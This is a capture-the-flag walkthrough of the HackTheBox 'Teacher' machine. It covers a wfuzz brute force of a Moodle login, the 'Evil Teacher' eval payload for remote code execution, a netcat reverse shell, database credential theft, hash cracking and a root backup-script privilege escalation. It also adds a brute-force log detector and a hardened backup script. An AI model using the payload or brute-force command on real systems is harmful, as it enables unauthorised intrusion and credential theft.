Hackthebox Walkthrough — Teacher
Local IP : 10.10.14.4
Target : 10.10.10.153
Step 1 : Nmap Enumeration
Only port 80 (HTTP web server) is open.
Version: Apache httpd 2.4.25 (running on Debian Linux)
Browse the website.
It tells us a new portal is open for teachers and students.
Clicking the other links takes us to the gallery.
Step 2 : Running dirbuster to enumerate
Browse to /images.
We find that the image 5.png contains some error text.
Potential password fragment: Th4CoolTheacha
Username: Giovanni
We also learn that the Moodle CMS is running on the web server.
Use crunch to generate a password list file.
Generate a list of 15-character passwords and brute-force the correct one.
Use wfuzz to fuzz out the password:
wfuzz -w password.txt -L -d "username=Giovanni&password=FUZZ" --hw 1224 http://10.10.10.153/moodle/login/index.php
The password is : Th4C00lTheacha#
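The login brute force above leaves a recognisable trace in the web server's access log. The following shell snippet is an added example (not part of this write-up, and not Moodle's or wfuzz's code) that runs over a constructed Apache combined-format log excerpt and reports any client with many POSTs to the Moodle login page. The status-code heuristic (200 when the login form is re-rendered after a failure, 303 for the redirect after a successful login) and the Wfuzz User-Agent string in the sample lines are assumptions.

```shell
#!/bin/sh
# Constructed Apache combined-format log excerpt (not taken from the target).
# One normal visitor (10.10.10.50) and one client hammering the Moodle login
# form: five POSTs answered with 200 (form re-rendered) and a sixth answered
# with 303 (redirect after a successful login).
sample_log() {
    cat <<'EOF'
10.10.10.50 - - [10/Nov/2018:09:59:58 +0000] "GET /moodle/login/index.php HTTP/1.1" 200 5173 "-" "Mozilla/5.0"
10.10.10.50 - - [10/Nov/2018:10:00:03 +0000] "POST /moodle/login/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"
10.10.14.4 - - [10/Nov/2018:10:00:10 +0000] "POST /moodle/login/index.php HTTP/1.1" 200 7321 "-" "Wfuzz/2.2"
10.10.14.4 - - [10/Nov/2018:10:00:10 +0000] "POST /moodle/login/index.php HTTP/1.1" 200 7321 "-" "Wfuzz/2.2"
10.10.14.4 - - [10/Nov/2018:10:00:11 +0000] "POST /moodle/login/index.php HTTP/1.1" 200 7321 "-" "Wfuzz/2.2"
10.10.14.4 - - [10/Nov/2018:10:00:11 +0000] "POST /moodle/login/index.php HTTP/1.1" 200 7321 "-" "Wfuzz/2.2"
10.10.14.4 - - [10/Nov/2018:10:00:12 +0000] "POST /moodle/login/index.php HTTP/1.1" 200 7321 "-" "Wfuzz/2.2"
10.10.14.4 - - [10/Nov/2018:10:00:12 +0000] "POST /moodle/login/index.php HTTP/1.1" 303 0 "-" "Wfuzz/2.2"
10.10.14.4 - - [10/Nov/2018:10:00:20 +0000] "GET /moodle/my/ HTTP/1.1" 200 9120 "-" "Wfuzz/2.2"
EOF
}

# count_login_posts THRESHOLD
# Reads a combined-format access log on stdin and prints, for each client
# address with at least THRESHOLD POSTs to the Moodle login page:
#   <ip> <total POSTs> <POSTs answered with 200>
# The 200 count approximates failed attempts (assumption: Moodle re-renders
# the form on failure and redirects on success); many failures followed by
# a single redirect is the signature of a brute force that finally succeeded.
count_login_posts() {
    awk -v thr="$1" '
        $6 == "\"POST" && $7 == "/moodle/login/index.php" {
            total[$1]++
            if ($9 == 200) failed[$1]++
        }
        END {
            for (ip in total)
                if (total[ip] >= thr)
                    print ip, total[ip], failed[ip] + 0
        }' | sort
}

# Example run: flag any address with five or more login POSTs.
sample_log | count_login_posts 5
```

On the sample above the only line printed is for 10.10.14.4, with six POSTs of which five were answered with the login form again. The same awk filter can be pointed at a real log with `count_login_posts 20 < /var/log/apache2/access.log`; the threshold and the path are the only site-specific parts.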
Log in to Moodle.
We are now logged in to the dashboard as Giovanni.
Google for Moodle exploits and find the "EVIL TEACHER" exploit for remote code execution:
https://blog.ripstech.com/2018/moodle-remote-code-execution/
In the math formula function, the PHP eval() call allows execution of arbitrary PHP code.
Turn editing on.
Add a quiz.
Add some questions.
Add the successful payload /*{a*/`$_GET[0]`;//{x}}
URL-decode and modify the code to make it remotely executable.
Here we get a reverse shell back with netcat.
Spawn a Python TTY shell.
Go to the Moodle directory; the config.php file contains the database password for MySQL.
Log in to the database:
SELECT * FROM mdl_user\G
We find a password hash under giovannibak.
Google the MD5 hash; it cracks to expelled.
Grab the user flag.
Run LinEnum.sh from /tmp: nothing interesting.
In /tmp we see a course backup zip file.
The backup.sh script we found in /usr/bin tells us the backup does the following:
go to the home directory /home/giovanni/work
create an archive with the content of the courses directory
go to /tmp
give read and write permissions to everybody on the /home/giovanni/work/tmp directory and its subdirectories
The script can be leveraged to retrieve the content of the /root folder and gain the root flag: the courses directory can be renamed, so we can make the script extract root.txt for us.
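For comparison with the backup job described above, here is a hardened shape of such a script. It is an added example, not the box's /usr/bin/backup.sh (whose text the write-up does not reproduce); the function name safe_backup and its WORKDIR/OUTDIR arguments are assumptions. The two properties that make the original abusable are addressed directly: the job refuses to archive a courses entry that is, or contains, a symbolic link, and it writes the archive with owner-only permissions instead of opening the output tree to everyone.

```shell
#!/bin/sh
# Hardened shape of a "tar a user-controlled directory and drop it in /tmp"
# backup job. Added example, not the box's /usr/bin/backup.sh. Assumed API:
#   safe_backup WORKDIR OUTDIR
# archives WORKDIR/courses into OUTDIR/backup.tar.gz and returns 1 instead
# of archiving when "courses" itself, or anything under it, is a symlink.

safe_backup() {
    work="$1"
    out="$2"
    src="$work/courses"

    # Refuse a symlinked or missing source: a user who owns WORKDIR could
    # otherwise point "courses" at a directory only the job's owner can read.
    if [ -L "$src" ] || [ ! -d "$src" ]; then
        echo "refusing: $src is a symlink or not a directory" >&2
        return 1
    fi
    # The same check for every entry below the source tree.
    if [ -n "$(find "$src" -type l | head -n 1)" ]; then
        echo "refusing: symlink found inside $src" >&2
        return 1
    fi
    # Subshell keeps the umask local. 077 means the archive is readable only
    # by its owner; no chmod 777 on the output tree.
    (
        umask 077
        mkdir -p "$out" &&
        tar -czf "$out/backup.tar.gz" -C "$work" courses
    )
}

# Throwaway fixture (constructed): a work directory with a real courses tree.
make_sandbox() {
    sb="$(mktemp -d)"
    mkdir -p "$sb/work/courses"
    echo "lesson 1" > "$sb/work/courses/lesson1.txt"
    echo "$sb"
}

# Demo: the real directory is archived, a symlink in its place is refused.
SB="$(make_sandbox)"
safe_backup "$SB/work" "$SB/out" && echo "archived: $SB/out/backup.tar.gz"
rm -rf "$SB/work/courses"
ln -s "$SB/somewhere-else" "$SB/work/courses"
safe_backup "$SB/work" "$SB/out2" || echo "symlink refused as expected"
rm -rf "$SB"
```

The symlink check is a guard, not a complete fix: between the check and the tar call a user who owns the work directory can still swap entries (a check-then-use race). The durable mitigation is to run the job with the privileges of the directory's owner rather than as root, and to write the archive to a location that owner cannot modify.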